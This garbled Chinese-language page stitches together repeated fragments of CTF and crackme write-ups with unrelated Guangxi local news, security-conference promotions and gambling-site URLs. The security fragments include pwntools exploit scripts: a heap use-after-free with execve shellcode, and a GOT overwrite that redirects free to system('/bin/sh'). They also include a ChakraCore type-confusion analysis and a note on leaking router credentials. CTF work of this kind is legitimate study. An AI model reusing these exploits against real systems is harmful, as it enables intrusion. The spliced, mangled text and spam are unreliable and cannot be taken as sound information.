成片的果林沿着公路两旁铺开,一个个经过套袋处理的青枣挂满枝头……仲冬时节,走进广西平南县丹竹镇梅令村,村民们介绍,当地大青枣1月份开始集中上市,一直持续到3月份。 :0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11AMMPTE结构是一个多重子结构的联合体,它们被Windows内存管理器的页错误处理机制用来搜索由PTE表示的页位置。。  桂平作为本次房车露营大会的举办地,重点推出了一些极具地方特色的汽车房车露营综合性体验活动,包括露营美食嘉年华、广西民俗竞技表演、民族团结运动汇、“营光”户外音乐季、“营光”夜跑派对等,让前来参会的游客全方位体验房车露营的乐趣。在扫描根和第一轮复制之后,扫描新分配的to-space中的对象以供参考。,利用思路利用cheat在chunk中放置shellcode,修改got指向chunk中的shellcode相关结构体structx_acc{__int64field_0;charusername[16];charpassword[16];x_character*character;};structx_character{charname[16];__int64health;__int64stamina;__int64weight;__int64location;x_item*item_head;};structx_cheat_st{charname[16];charcontent[32];};structx_chunk{__int64ref_count;__int64size;chardata[1];};structx_item{__int64id;__int64weight;__int64count;x_item*next;__int64bullet;__int64power;};脚本###=Truefrompwnimport*importsysimporttimeimportrecontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./pwn7)ifargs[LOCAL]:io=process(./pwn7)else:io=remote(,8888)sc="\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"defcmd_signup(username,password,character_name):(Signup==============================)(2)(inputyourusername)(username)(inputyourpassword)(password)(inputyourcharacter\sname)(character_name)()returndefcmd_login(username,password):(Signup==============================)(1)(Inputyourusername:)(username)(Inputyourpassword:)(password)returndefcmd_exit():()(0)returndefcmd_show():()(1)(===============================)(==============================)returndefcmd_item_enter():()(2)returndefcmd_item_leave():(YourChoice:)(str(-1))(wrongchoice)returndefcmd_item_view(id):(YourChoice:)(str(id))data=()(2)returndatadefcmd_item_delete(id):(YourChoice:)(str(id))()(1)data=()(2)returndatadefcmd_goto(location):()(3)()(str(location))returndefcmd_explore(l):()(4)(Youfind:)s=(2)ifs==no:(found)returns+=(0)(Doyouwanttopickupit)ifsinl:(y)else:(n)s=returnsdefcmd_explore_until_success(l):while1:item_name=cmd_explore(l)print(pickup:%s%item_name)ifnot(item_name==):(item_name)(1)returndefcmd_cheat(first,name,content):()(5)iffirst==1:(name:)(name)(content:)(content)else:(content:)(content)returndefexploit():username=a*8password=b*8character_name=c*8cmd_signup(username,password,character_name)cmd_login(username,password)#cmd_show()cmd_goto(1)cmd_cheat(1,x*8,y*0x18)#pickup2differentitemsl=[98k,S12K,AKM,M16A4,UMP45,SKS,M416,M24,Bandage,Drink,FirstAidKit]cmd_explore_until_success(l)cmd_explore_until_success(l)#deleteoneitem(initfreelist)cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#(io)#input()#putfakepointerinitem2buf=buf+=z*0x40#item1(freed)#item2headerbuf+=p64(1)#ref_countbuf+=p64(0x18)#size#item2buf+=p64([memcmp])#id(fakepointer)buf+=p64(0)#weightbuf+=p64(1)#countbuf+=p64(0)#nextbuf+=p64(0)#bulletbuf+=p64(0)#power#freelistbuf+=p64(0)#ref_countbuf+=p64(0x20)#sizebuf+=p64(0)buf+=p64(0)cmd_cheat(0,x*8,y*0x20+buf)#overwritetargetwithfreelist+0x10cmd_item_enter()data=cmd_item_delete(1)cmd_item_leave()#copyshellcodetofreelist+0x10buf=buf+=z*0xA0buf+=sccmd_cheat(0,x*8,y*0x20+buf)cmd_exit()#triggermemcmp(callshellcode)cmd_login(username,password)()returnexploit()flag{Cr4k4ndH4ckF0rFunG00dLuck2o17}在第二个变体中,我们注意到在不同的设备中,查杀过程行为是不同的。秉承着技术与干货的原则,看雪学院于2017年11月成功举办了第一届安全开发者峰会,议题涵盖了安全编程、软件安全测试、智能设备安全、物联网安全、漏洞挖掘、移动安全、WEB安全、密码学、逆向技术、加密与解密、系统安全等,吸引了业内顶尖的开发者和技术专家,旨在推动软件开发安全的深入交流与分享,为安全人员、软件开发者、广大互联网人士及行业相关人士提供最具价值的交流平台。通过分析,下面使用python进行穷举,代码如下:importhashlibimportsysdefhash_md5(src):myMd5=()(src)myMd5_Digest=()returnmyMd5_Digestdefis_ok(v):ifv[2:12]==888aeda4ab:return1return0defdo_md5(src):x=x+=chr(ord(src[0])+1)foriinrange(1,len(src)):x+=chr(ord(src[i])+i)x=hash_md5(hash_md5(x))returnxdefget_sn(str,num):if(num==1):forxinstr:yieldxelse:forxinstr:foryinget_sn(str,num-1):yieldx+yif__name__==__main__:printis_ok(a3888aeda4abba91f31c8e0caae48cb9)#000000x=do_md5(000000)printx[2:12]==fd9e2ddbd6forsninget_sn(0123456789abcdefghijklmnopqrstuvwxyz,6):x=do_md5(sn)ifsn[2:6]==0000:printsnifis_ok(x)==1:printsn=+snbreak这里的newArr的创建操作如下//IfthesourceobjectisanArrayexoticobjectweshouldtr*newObj=ArraySpeciesCreate(obj,0,scriptContext);JavascriptArray*newArr=nullptr;//Ifthenewobjectwecreatedisanarray,rememberthatasitwillsaveustimesettingpropertiesintheobjectbelowif(JavascriptArray::Is(newObj)){newArr=JavascriptArray::FromVar(newObj);}注意虽然进行了转换,但是最后newArr却是NativeIntArray类型=0x000001E353F7C5100x000001E353F7C5100000000000000003........0x000001E353F7C5180000000600000000........0x000001E353F7C5200000000000000000........0x000001E353F7C5280000000100000002........0x000001E353F7C5300000000380000002.......\n0x000001E353F7C5388000000280000002......\n观察接下来的取值和赋值操作可以发现问题for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}...pArr的类型为JavascriptArraynewArr的类型为JavascriptNativeIntArray这里直接从pArr中取出值放入了newArr,很明显是一个类型混淆造成这个混淆的根本原因是设置了staticget[](){returndummy;}导致返回了一个JavascriptNativeIntArray,从而与JavascriptArray造成混淆。通过下面两个请求的uri可以泄露账号和密码,美国网件系列默认用户名admin,对于chakra来说这个函数实现在JavascriptArray::FilterHelper函数中,大体逻辑如下if(pArr){Assert(length=MaxArrayLength);uint32i=0;for(uint32k=0;klength;k++){if(!pArr-DirectGetItemAtFull(k,element)){continue;}selected=callBackFn-GetEntryPoint()(callBackFn,CallInfo(CallFlags_Value,4),thisArg,element,JavascriptNumber::ToVar(k,scriptContext),pArr);if(JavascriptConversion::ToBoolean(selected,scriptContext)){//Trytofastpathifthereturnobjectisanarrayif(newArr){newArr-DirectSetItemAt(i,element);}else{JavascriptArray::SetArrayLikeObjects(newObj,i,element);}++i;}}}代码的逻辑很容易理解,首先从源Array中依次取出元素,再根据用户callback进行判断,如果满足条件就置入新的Array中,否则会被丢弃。、www.vns9916.com、之后分析的进程注入技术都开源到这一个项目上。,OD载入,输入123456,点确定半天没反应,忽然来个内存异常。这样就可以将0替换为这样就可以绕过上面代码的检测,同时还可以能够正确地执行SQL语句。会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。。下面程序进行穷举:importosdeflength(number):n=numberl=0whilen0:n=n/10l+=1returnldefisok(number):res=0n=numberwhilen0:res=res*10+n%10n=n/10ifres==number:return1return0deftest(a):b2=a*9i=0whilei2:b2*=ab2*=9if(isok(b2)==1):print(%d=%d%(a,b2))breaki+=1return0defskip(a):b=1n=awhilen0:if((n%10)==0):a+=bn=n/10b=b*10returnadefmain():printskip(10089000)i=11111111whilei=99999999:i=skip(i)test(i)i+=1printoverreturn0if__name__==__main__:main()输出结果为:需要反向输入,即sn=97654321UseAfterFree本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。你也可以进行添加来保护其他文件夹,甚至包括其他驱动器上的文件夹。?Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit()但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528这些请求头都是可以通过请求头进行设置。Satori家族重复使用Mirai代码,包括网络扫描器,telnet密码尝试和看门狗禁用(图4)。与多家保险公司合作共建服务网点,使得惠农保险服务覆盖贵港市三区两县市全部乡镇,累计完成保费1142万元。这样的cms还有很多,如beecms,appcms。,通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528加时赛中,中国队员顶住压力,最终以比分4:2战胜对手,斩获金牌。澳门赌场图片如果有疑问,请亲自访问软件供应商的网站,并在那里检查更新。当安装CaseCreators更新时,相应的缓解已经配置在你的机器上了。,16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy08。 16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy082018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。。通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528桂平金田是1851年洪秀全发动中国近代历史规模最大、时间最长的太平天国农民起义策源地,杨秀清、石达开、韦昌辉、肖朝贵、秦日纲等著名将领是贵港籍人。1.处理逻辑(大数运算用的gmp)sn长度为70,前6位是e,后面的是p已知n,d,pq,求e,p,qn:6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d:2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4B2.求解因为e0x1000000,所以可以穷举e,得到e:F552B3有了e,因为e过小,可以直接得到p和q这里借用stackoverflow上的内容3.脚本importitertoolsfromgmpy2import*#e=0xF552B3n=0x6248BC3AB92A33B000FDB88568F19727F92F79EB68FF6AD73203EFD20A3E331BE941C7AA288095F33BC4B255FD983114D480EFFBEE2E313E6218A57F9CCC8189d=0x2476A7F02588913F228923E1F36F963F29708C07B117396817A6B94C336FC77FF7D381925EB40CFED8FBE894570155E41569B4EC69B26CB0320105A29651CB4Bdefget_e(n,d):(0xFFFFFF,-1):ifi=2:return0e=iifnotis_prime(e,500):continuem=0x12345678c=powmod(m,d,n)m2=powmod(c,e,n)ifm==m2:returnereturn0defget_p_q(e,n,d):ed=mul(e,d)k1=div(ed,n)kk=[k1-1,k1,k1+1]foriinrange(len(kk)):k=kk[i](t,rem)=t_divmod(ed-1,k)if(rem!=0):continues=n+(1)-(t)r=isqrt(mul(s,s)-mul(4,n))p=div(s+r,2)q=div(s-r,2)if(pq):p=qprint(sn:%X%X%(e,p))returne=get_e(n,d)print(e:%X%e)get_p_q(e,n,d) ,但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A最终的结果为:MISC虽然这道题目是做出来了,但是其中还是存在一些问题没有搞清楚。发挥好文化部门作用,创作以荷花为主题的歌曲,歌词中包含了“藕(荷花)”内容,宣传我区的旅游景点和“荷文化”。一些未文档化的结构在不同Windows版本间有所变化。我有一个1024x600的小上网本,好多年了还在用。,为了简化示范我选择一个包含那些在不同Windows中预设置的结构体:typedefstruct{DWORDUniqueProcessIdOffset;DWORDTokenOffset;}VersionSpecificConfig;注意我们实际上并没存储ActiveProcessLinks偏移,因为它一直为UniqueProcessId+8。、www.vns8099.com、王荣昌是国家一级美术师,是当代画坛的画荷大家,其作品仙风道骨,古朴浑厚,高古空灵,具备诗意与古典之风骨。、  自治区人大农业农村委员会主任张明沛,自治区农业厅党组副书记、副厅长郭绪全,市委常委、副市长黄卫平,中国副食品流通协会副会长王筱斌在开幕式上致辞。会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。OD载入,输入123456,点确定半天没反应,忽然来个内存异常。 我们注意到9个IoT漏洞利用已经被整合到当前的样本中,如下所示:DlinkGoaheadJAWSNetgearVacronNVR网件LinksysdlinkAVTECH攻击者不断地在样本中增加了更多的新漏洞,其中一个在漏洞发布后两天就被采用。Arch:amd64-64-littleRELRO:PartialRELROStack:CanaryfoundNX:NXenabledPIE:PIEenabled1:newbox1~box52:deletefree完之后没有修改in_use标志,可以多次free,存在UAF,只有box2和box3可以free3:edit4:print5:guessseed=seed;srand((unignedint)seed);v=rand();if(input()==v)printseed;elseprintv;解题思路我这个解法好像有点麻烦,等结束后学习下标准解法是什么样的..leakprocessbase,leaklibcbase,overwritegot,getshelltest_####*seed=0;intmain(){seed=seed;srand(*(unsignedint*)seed);printf("%p",seed);printf("0x%x",rand());return0;}guess_####*seed=0;intmain(intargc,char**argv){intlow3=atoi(argv[1]);intr=atoi(argv[2]);unsignedintseed;unsignedinti;for(i=0;i=0xFFFFF;i++){seed=i12;seed+=low3;srand(seed);if(rand()==r){printf("0x%x",rand());return0;}}printf("end");return0;}###=Truefrompwnimport*importsyscontext(arch=amd64,kernel=amd64,os=linux)#_level=debugelf=ELF(./club)ifargs[LOCAL]:libc_path=/lib/x86_64-linux-gnu/io=process(./club)("processbase:"+hex(()[/root/Desktop/test/pediy_pwn/club]))("processlibc_base:"+hex(()[libc_path]))else:libc_path=./io=remote(,8888)libc=ELF(libc_path)defcmd_new(index,size):()(1)()(str(index))()(str(size))()returndefcmd_delete(index):()(2)()(str(index))returndefcmd_edit(index,buf):()(3)()(str(index))(buf)returndefcmd_print(index):()(4)()(str(index))data=()returndatadefcmd_guess_wrong(v):()(5)()(str(v))(Thenumberis)data=(!)[:-1]returndatadefcmd_guess_right(v):()(5)()(str(v))(Yougetasecret:)data=(!)[:-1]returndatadefcmd_quit(name):()(6)()(name)()returndefexploit():#leakprocessbasev=cmd_guess_wrong(0)p_guess=process([./guess_seed,str(0x148),v])guess_r=p_()#printguess_rseed=cmd_guess_right(int(guess_r,16))#printhex(int(v))process_base=int(seed)-("leakedprocessbase:"+hex(process_base))#(io)#input()#triggercoaleace#usebox4toeditbox2box3len2=0x1A0len3=0x1F0cmd_new(2,len2)cmd_edit(2,A*len2)cmd_new(3,len3)cmd_delete(2)cmd_delete(3)cmd_new(4,len2+len3)data=cmd_print(4)[:6]libc_main_arena_top=0x3C4B78libc_base=u64((8,\x00))-libc_main_arena_topprint(leakedlibc_base:%x%libc_base)#createafakefreechunkinsidebox2beforebox3box2_ptr=process_base+0x202110print(box2_ptr:%x%box2_ptr)buf=buf+=p64(0)+p64(len2+1)+p64(box2_ptr-0x18)+p64(box2_ptr-0x10)buf+=A*(len2-0x20)buf+=p64(len2)buf+=p64(len3)cmd_edit(4,buf)cmd_delete(3)#box2_ptr-0x18writtentobox2_ptrcmd_edit(3,/bin/sh\x00)#[box2]=got_freebuf=buf+=p64(0)buf+=p64(0)#box0buf+=p64(0)#box1buf+=p64(process_base+[free])cmd_edit(2,buf)#[got_free]=systembuf=buf+=p64(libc_base+[system])cmd_edit(2,buf)#system(/bin/sh)cmd_delete(3)()returnexploit()因此,内存管理器,对任何给定的实例,只能访问当前进程的MMWSL即目前在CPU上运行进程的线程。尝试寻找原因:修改了smali但未能成功,似乎是底层限制;尝试切换最新版本(),可行。106个重大项目集中开竣工,总投资250多亿元,项目涉及产业、城建、民生、交通、教育、生物制药、现代农业等领域,贵港市委书记李新元在主会场宣布项目集中开工竣工。运行时几乎所有的JS开发者在浏览器中都使用过API(例如“setTimeout”)。UseAfterFree本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。,:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:0040